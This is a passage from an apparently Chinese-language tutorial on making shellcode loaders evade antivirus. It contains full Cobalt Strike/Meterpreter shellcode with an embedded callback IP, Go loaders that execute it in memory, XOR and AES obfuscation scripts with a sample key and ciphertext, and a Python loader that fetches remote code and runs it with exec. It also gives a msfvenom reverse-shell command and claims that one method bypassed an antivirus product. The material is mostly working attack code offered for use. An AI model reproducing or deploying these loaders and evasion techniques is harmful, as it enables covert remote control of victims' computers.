x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x6c,0x1e,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x61,0x44,0x42,0x76,0x00,0x69,0x48,0x4a,0x00,0x46,0xb0,0x41,0x65,0xaa,0xb9,0xf6,0xdb,0x15,0x35,0x9f,0x57,0xb0,0x84,0x5a,0x19,0xd4,0x10,0xdb,0x36,0xe8,0xa0,0x6d,0x9b,0xe1,0x37,0x40,0xb8,0xb6,0x84,0xb9,0xae,0xdb,0x0c,0x3e,0x4c,0x40,0x58,0x0a,0x83,0x45,0xbc,0x37,0x7d,0x2a,0x4e,0x64,0x15,0x7f,0x7d,0x67,0xa6,0x1b,0x91,0x36,0xfb,0x3d,0x2d,0x50,0xb1,0x31,0xf5,0x19,0xda,0x90,0x3a,0x67,0xcc,0x06,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x55,0x48,0x53,0x29,0x0d,0x0a,0x00,0xe2,0x8b,0x7b,0xd2,0xca,0x55,0xe1,0x98,0xa8,0x6c,0xb9,0x4c,0xc4,0xdd,0x8e,0xef,0x2d,0xd6,0x66,0x44,0xcc,0x86,0x9e,0x8d,0x4c,0x5f,0x9b,0x81,0xc2,0x0f,0x7c,0xc4,0x3f,0xcb,0x8c,0x60,0xd0,0x72,0x21,0xc1,0xc9,0x62,0xb4,0x6b,0xb3,0x21,0x73,0xd0,0x7a,0xef,0xba,0x6c,0x94,0x5a,0x4a,0x0c,0xbf,0x09,0x30,0x96,0xfa,0x22,0x70,0x2a,0x4e,0x8f,0x55,0x87,0xe1,0xe9,0xdf,0x8d,0x6a,0x1d,0x0e,0x3c,0x9f,0xad,0x17,0x76,0x5e,0x54,0x51,0xcd,0x74,0xa0,0x63,0xd4,0x82,0xb4,0xd8,0x80,0x98,0xb7,0x20,0xa6,0x11,0xc0,0x9e,0xd5,0xee,0x8e,0x16,0x00,0x12,0x53,0xfd,0xd5,0x05,0xd1,0x07,0x8e,0x7d,0x1a,0xef,0x0d,0xda,0xd6,0xf7,0x13,0xec,0x97,0x4e,0xd7,0xec,0x38,0x6d,0xe5,0x71,0x9c,0x09,0x94,0xf8,0x25,0xa1,0x3e,0x74,0x82,0x67,0x17,0x4f,0x24,0x92,0xba,0x4c,0x42,0x46,0x5b,0x29,0xdf,0x7e,0x13,0x01,0xfb,0xae,0xde,0xdc,0xf2,0xf3,0x9f,0x99,0x94,0xb6,0x5d,0x57,0x77,0x8b,0x9c,0x79,0xeb,0xef,0xaf,0xdd,0xdf,0x5e,0xde,0x7e,0x4a,0xd9,0x11,0x03,0xda,0x62,0x18,0x11,0x54,0x96,0xbf,0x6b,0x9f,0xaa,0xc6,0x8d,0xc9,0xfd,0x90,0x12,0x3b,0x6c,0x88,0x10,0x00,0x31,0xe8,0x2e,0x5d,0xae,0x09,0x60,0xfb,0x9d,0x5b,0xbd,0x64,0xd1,0xa3,0xd3,0x61,0x8d,0xac,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x32,0x30,0x2e,0x32,0x35,0x2e,0x32,0x35,0x30,0x2e,0x34,0x39,0x00,0x12,0x34,0x56,0x78,
}
)
func checkErr(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}
func main() {
shellcode := shellcode_buf
if len(os.Args) > 1 {
shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
checkErr(err)
shellcode = shellcodeFileData
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
checkErr(err)
syscall.Syscall(addr, 0, 0, 0, 0)
}
运行
go run l.go 即可上线
打包成1.exe
go build .\1.go
编译后会被杀
#基本知识:
1、运行1.go脚本
go run 1.go
2、编译1.go脚本
go build 1.go
3、没有弹窗的exe命令编译:
go build -ldflags="-H windowsgui -w -s" 1.go
进行xor编码后仍然会被杀
xor编码脚本
def xor(shellcode, key):
new_shellcode = ""
key_len = len(key)
# 对shellcode的每一位进行xor亦或处理
for i in range(0, len(shellcode)):
s = ord(shellcode[i])
p = ord((key[i % key_len]))
s = s ^ p # 与p异或,p就是key中的字符之一
s = chr(s)
new_shellcode += s
return new_shellcode
def random_decode(shellcode):
j = 0
new_shellcode = ""
for i in range(0,len(shellcode)):
if i % 2 == 0:
new_shellcode[i] = shellcode[j]
j += 1
return new_shellcode
def add_random_code(shellcode, key):
new_shellcode = ""
key_len = len(key)
# 每个字节后面添加随机一个字节,随机字符来源于key
for i in range(0, len(shellcode)):
#print(ord(shellcode[i]))
new_shellcode += shellcode[i]
# print("&"+hex(ord(new_shellcode[i])))
new_shellcode += key[i % key_len]
#print(i % key_len)
return new_shellcode
# 将shellcode打印输出
def str_to_hex(shellcode):
raw = ""
for i in range(0, len(shellcode)):
s = hex(ord(shellcode[i])).replace("0x",',0x')
raw = raw + s
return raw
if __name__ == '__main__':
shellcode = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x6c\x1e\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x61\x44\x42\x76\x00\x69\x48\x4a\x00\x46\xb0\x41\x65\xaa\xb9\xf6\xdb\x15\x35\x9f\x57\xb0\x84\x5a\x19\xd4\x10\xdb\x36\xe8\xa0\x6d\x9b\xe1\x37\x40\xb8\xb6\x84\xb9\xae\xdb\x0c\x3e\x4c\x40\x58\x0a\x83\x45\xbc\x37\x7d\x2a\x4e\x64\x15\x7f\x7d\x67\xa6\x1b\x91\x36\xfb\x3d\x2d\x50\xb1\x31\xf5\x19\xda\x90\x3a\x67\xcc\x06\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x55\x48\x53\x29\x0d\x0a\x00\xe2\x8b\x7b\xd2\xca\x55\xe1\x98\xa8\x6c\xb9\x4c\xc4\xdd\x8e\xef\x2d\xd6\x66\x44\xcc\x86\x9e\x8d\x4c\x5f\x9b\x81\xc2\x0f\x7c\xc4\x3f\xcb\x8c\x60\xd0\x72\x21\xc1\xc9\x62\xb4\x6b\xb3\x21\x73\xd0\x7a\xef\xba\x6c\x94\x5a\x4a\x0c\xbf\x09\x30\x96\xfa\x22\x70\x2a\x4e\x8f\x55\x87\xe1\xe9\xdf\x8d\x6a\x1d\x0e\x3c\x9f\xad\x17\x76\x5e\x54\x51\xcd\x74\xa0\x63\xd4\x82\xb4\xd8\x80\x98\xb7\x20\xa6\x11\xc0\x9e\xd5\xee\x8e\x16\x00\x12\x53\xfd\xd5\x05\xd1\x07\x8e\x7d\x1a\xef\x0d\xda\xd6\xf7\x13\xec\x97\x4e\xd7\xec\x38\x6d\xe5\x71\x9c\x09\x94\xf8\x25\xa1\x3e\x74\x82\x67\x17\x4f\x24\x92\xba\x4c\x42\x46\x5b\x29\xdf\x7e\x13\x01\xfb\xae\xde\xdc\xf2\xf3\x9f\x99\x94\xb6\x5d\x57\x77\x8b\x9c\x79\xeb\xef\xaf\xdd\xdf\x5e\xde\x7e\x4a\xd9\x11\x03\xda\x62\x18\x11\x54\x96\xbf\x6b\x9f\xaa\xc6\x8d\xc9\xfd\x90\x12\x3b\x6c\x88\x10\x00\x31\xe8\x2e\x5d\xae\x09\x60\xfb\x9d\x5b\xbd\x64\xd1\xa3\xd3\x61\x8d\xac\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x32\x30\x2e\x32\x35\x2e\x32\x35\x30\x2e\x34\x39\x00\x12\x34\x56\x78"
# 这是异或和增加随机字符使用的key
key = "iqe"
#print(shellcode[0])
#print(len(shellcode))
# 首先对shellcode进行异或处理
shellcode = xor(shellcode, key)
#print(len(shellcode))
# 然后在shellcode中增加随机字符
shellcode = add_random_code(shellcode, key)
# 将shellcode打印出来
print(str_to_hex(shellcode))
但是还可以使用无文件落地技术,之前我们是向外请求的方式获取远程服务器上的shellcode和加载器,也可以以参数传递的方式来载入shellcode
先进行aes加密生成密文和解密的密钥
3-shellcode.go
package main
import (
"bytes"
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"encoding/hex"
"fmt"
"math/rand"
"os"
"strings"
"time"
)
//随机生成key,后面用来解密的
func key(l int) string {
str := "0123456789abcdefghijklmnopqrstuvwxyz"
bytes := []byte(str)
result := []byte{}
r := rand.New(rand.NewSource(time.Now().UnixNano()))
for i := 0; i < l; i++ {
result = append(result, bytes[r.Intn(len(bytes))])
}
return string(result)
}
//使用PKCS5进行填充用来
func PKCS5Padding(ciphertext []byte, blockSize int) []byte {
padding := blockSize - len(ciphertext)%blockSize
padtext := bytes.Repeat([]byte{byte(padding)}, padding)
return append(ciphertext, padtext...)
}
//进行aes加密
func AesEncrypt(origData, key []byte) ([]byte, error) {
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
blockSize := block.BlockSize()
origData = PKCS5Padding(origData, blockSize)
blockMode := cipher.NewCBCEncrypter(block, key[:blockSize])
crypted := make([]byte, len(origData))
blockMode.CryptBlocks(crypted, origData)
return crypted, nil
}
//主函数入口,对字符进行了处理
func main() {
argsWithProg := os.Args
if len(argsWithProg) < 2 {
fmt.Println("usage : ", argsWithProg[0], "66.c")
return
}
confFile := os.Args[1]
str2 := strings.Replace(confFile, "\\x", "", -1)
data, _ := hex.DecodeString(str2)
key1 := key(16)
fmt.Println("Key:", key1)
var key []byte = []byte(key1)
aes, _ := AesEncrypt(data, key)
encoded := base64.StdEncoding.EncodeToString(aes)
fmt.Println("Code:", encoded)
}
go run .\3-shellcode.go \xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x6c\x1e\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\x3e\x4c\x40\x58\x0a\x83\x45\xbc\x37\x7d\x2a\x4e\x64\x15\x7f\x7d\x67\xa6\x1b\x91\x36\xfb\x3d\x2d\x50\xb1\x31\xf5\x19\xda\x90\x3a\x67\xcc\x06\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x55\x48\x53\x29\x0d\x0a\x00\xe2\x8b\x7b\xd2\xca\x55\xe1\x98\xa8\x6c\xb9\x4c\xc4\xdd\x8e\xef\x2d\xd6\x66\x44\xcc\x86\x9e\x8d\x4c\x5f\x9b\x81\xc2\x0f\x7c\xc4\x3f\xcb\x8c\x60\xd0\x72\x21\xc1\xc9\x62\xb4\x6b\xb3\x21\x73\xd0\x7a\xef\xba\x6c\x94\x5a\x4a\x0c\xbf\x09\x30\x96\xfa\x22\x70\x2a\x4e\x8f\x55\x87\xe1\xe9\xdf\x8d\x6a\x1d\x0e\x3c\x9f\xad\x17\x76\x5e\x54\x51\xcd\x74\xa0\x63\xd4\x82\xb4\xd8\x80\x98\xb7\x20\xa6\x11\xc0\x9e\xd5\xee\x8e\x16\x00\x12\x53\xfd\xd5\x05\xd1\x07\x8e\x7d\x1a\xef\x0d\xda\xd6\xf7\x13\xec\x97\x4e\xd7\xec\x38\x6d\xe5\x71\x9c\x09\x94\xf8\x25\xa1\x3e\x74\x82\x67\x17\x4f\x24\x92\xba\x4c\x42\x46\x5b\x29\xdf\x7e\x13\x01\xfb\xae\xde\xdc\xf2\xf3\x9f\x99\x94\xb6\x5d\x57\x77\x8b\x9c\x79\xeb\xef\xaf\xdd\xdf\x5e\xde\x7e\x4a\xd9\x11\x03\xda\x62\x18\x11\x54\x96\xbf\x6b\x9f\xaa\xc6\x8d\xc9\xfd\x90\x12\x3b\x6c\x88\x10\x00\x31\xe8\x2e\x5d\xae\x09\x60\xfb\x9d\x5b\xbd\x64\xd1\xa3\xd3\x61\x8d\xac\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x32\x30\x2e\x32\x35\x2e\x32\x35\x30\x2e\x34\x39\x00\x12\x34\x56\x78
Key: 75luxizecmc8ts99
Code: ooLmgWK/0pCE3+h8AqlxjjpGWYCU6ev324EAscfvbNO6H/alDXlmCN/BHdJHvczO6X27H5auQUl4DXllrXiffRvBiVY+Wmh4HPTPJOVqpnKFwZ7AyA9FUiMXIbraPhLdATJ6+cZnK0Texl0HlhxG17IDZThRfCNdXRFvSBTtt6fXYFz//kux0g1llH0JvxBP4YtvujGvW9bc7VpkmnFHyOrb0hON1WxS7V9EkIayffpf+/2BdyLj8ylWztWXvggY2eh9hrEXCTOL5h70fvYp9FpCyONK5smWXvPKSiGdyBH2cTmXrxYPWZQWZcPwD9PHtQm/OB5D5KA6/El61DS3Ma9VzzBBV8IVaAVDCI9IXPeZ3Ge/P4sY0gL9rZ91UoloGn59W2HSKPabLUSO+7tRReEOFc9IXSKTLAApDT2v6VVG91cUU1lkhSk4cZ9B07WBr/LiN+CwE106ize8ocOUq5L3fqhTH+X6QsRcXzdJKNUo4Jej7RiVqZ32bgrGnEHVv4WpoCmGhwRqVnrMLvGc6DLj23Byzr25MP+eUot5KMfiUsBFFaMpm/k9oIpdfiRCPxXDjv6p1qZ2tZB275PJce7igMKyIBOQ/zZcVBVFkbcxTOVxriimhB7qZY4won9A/IQEVGq26XrSSvzqM1J7PrSiVJuIqb9vp5O71qciDovEcXaAoroIEhq2r4mmoLuV58KEVqTjdFTiUi6TXJDAJnsMwZnjB6NXBBXWPXdvYUHYFYN/JSanSiJQJKHh+fzJVbmSHVIclmDFneUr8058fvg44tFjbKsw+8tM4CCkcM8EdZkxzdY2BmpGhaHpEVS7Zq1TsCeXvk5X1Krsl8VxCkCKW6GphRkS5iui76l94f7Ya0b6+AageM2xv/yKnBkW85gaYS1wz3ZuHtbYKVuHIpiiwsuOEcMQpWPthbECI/8MkA+OD+H10CkaJ8Tt6YDNTlG4mrb66HA=
执行脚本
3-loader.go
package main
import (
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"os"
"syscall"
"unsafe"
)
//这一块是定义一些东西去加载我们的shellcode
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
ret, _, _ := procVirtualProtect.Call(
uintptr(lpAddress),
uintptr(dwSize),
uintptr(flNewProtect),
uintptr(lpflOldProtect))
return ret > 0
}
//shellcode执行函数
func Run(sc []byte) {
f := func() {}
var oldfperms uint32
if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
panic("Call to VirtualProtect failed!")
}
**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
var oldshellcodeperms uint32
if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
panic("Call to VirtualProtect failed!")
}
f()
}
//同样为了保证我们的shellcode正常运行要进行PKCS5的操作
func PKCS5UnPadding(origData []byte) []byte {
length := len(origData)
unpadding := int(origData[length-1])
return origData[:(length - unpadding)]
}
//经典的aes解密操作
func AesDecrypt(crypted, key []byte) ([]byte, error) {
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
blockSize := block.BlockSize()
blockMode := cipher.NewCBCDecrypter(block, key[:blockSize])
origData := make([]byte, len(crypted))
blockMode.CryptBlocks(origData, crypted)
origData = PKCS5UnPadding(origData)
return origData, nil
}
//运行主函数,主要是接受参数进行base64解码,ase解码,运行shellcode
func main() {
key1 := os.Args[1]
payload1 := os.Args[2]
encoded2, _ := base64.StdEncoding.DecodeString(payload1)
var key []byte = []byte(key1)
AES, _ := AesDecrypt(encoded2, key)
Run(AES)
}
go run .\3-loader.go 75luxizecmc8ts99 ooLmgWK/0pCE3+h8AqlxjjpGWYCU6ev324EAscfvbNO6H/alDXlmCN/BHdJHvczO6X27H5auQUl4DXllrXiffRvBiVY+Wmh4HPTPJOVqpnKFwZ7AyA9FUiMXIbraPhLdATJ6+cZnK0Texl0HlhxG17IDZThRfCNdXRFvSBTtt6fXYFz//kux0g1llH0JvxBP4YtvujGvW9bc7VpkmnFHyOrb0hON1WxS7V9EkIayffpf+/2BdyLj8ylWztWXvggY2eh9hrEXCTOL5h70fvYp9FpCyONK5smWXvPKSiGdyBH2cTmXrxYPWZQWZcPwD9PHtQm/OB5D5KA6/El61DS3Ma9VzzBBV8IVaAVDCI9IXPeZ3Ge/P4sY0gL9rZ91UoloGn59W2HSKPabLUSO+7tRReEOFc9IXSKTLAApDT2v6VVG91cUU1lkhSk4cZfTQevZcOciCduaV8DavCv7u6PYo81lc+pVovly6F8B8bA8RezG0WcIm/pgqmfT/SJR599Xf3zi8jthwWoKgwre4HXX9UwP42Cvt0mbofvJbeKnvxj/cMl+lEPl8c4kI8PFoYOwkdr+tLY5/DcrVIk314WqhU5UAdcHX+99aXQkKYOeu4o6s5zvwr+aWpFIiLbqV0WLZ0deTsXL80AT03EGkBuzw1p0Uc9B07WBr/LiN+CwE106ize8ocOUq5L3fqhTH+X6QsRcXzdJKNUo4Jej7RiVqZ32bgrGnEHVv4WpoCmGhwRqVnrMLvGc6DLj23Byzr25MP+eUot5KMfiUsBFFaMpm/k9oIpdfiRCPxXDjv6p1qZ2tZB275PJce7igMKyIBOQ/zZcVBVFkbcxTOVxriimhB7qZY4won9A/IQEVGq26XrSSvzqM1J7PrSiVJuIqb9vp5O71qciDovEcXaAoroIEhq2r4mmoLuV58KEVqTjdFTiUi6TXJDAJnsMwZnjB6NXBBXWPXdvYUHYFYN/JSanSiJQJKHh+fzJVbmSHVIclmDFneUr8058fvg44tFjbKsw+8tM4CCkcM8EdZkxzdY2BmpGhaHpEVS7Zq1TsCeXvk5X1Krsl8VxCkCKW6GphRkS5iui76l94f7Ya0b6+AageM2xv/yKnBkW85gaYS1wz3ZuHtbYKVuHIpiiwsuOEcMQpWPthbECI/8MkA+OD+H10CkaJ8Tt6YDNTlG4mrb66HA=
成功上线cs,加密值每次生成都是唯一的,每次运行想要重新生成,我们实际上要用到的只是加载器,生成器可以放在自己机子上,所以编译加载器即可,(上面方法已经过了某绒了)
go build 3-loader.go
#Golang-加载器分离式资源-AES
利用思路:
生成器生成Shellcode写入图片,
加载器代码无可疑Shellcode,资源接受。
https://github.com/Hangingsword/HouQing
#Python-加载器分离式参数&资源
利用思路:
执行函数编码后存放互联网资源上,
Shellcode通过参数接受调用代码。
python fls.py shellcode加密值
此思路也可以适用到其他地方,例如python
import ctypes
import sys
import requests
import base64
def fls(s):
#获取shellcode
# s=requests.get("http://xxx.xxx.xxx.xxx/123.txt").text
shellcode=base64.b64decode(s)
#获取执行代码
ss=requests.get("http://xxx.xxx.xxx.xxx/456.txt").text
func=base64.b64decode(ss)
exec(func)
if __name__ == '__main__':
s=sys.argv[1]
fls(s)
python.exe test01.py /OiPAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggi0gYAdNQhcl0PEmLNIsx/wHWMcDBzw2sAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpoeBn6MWgCABogieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
成功上线
C免杀
开启msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=6688 -f c
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
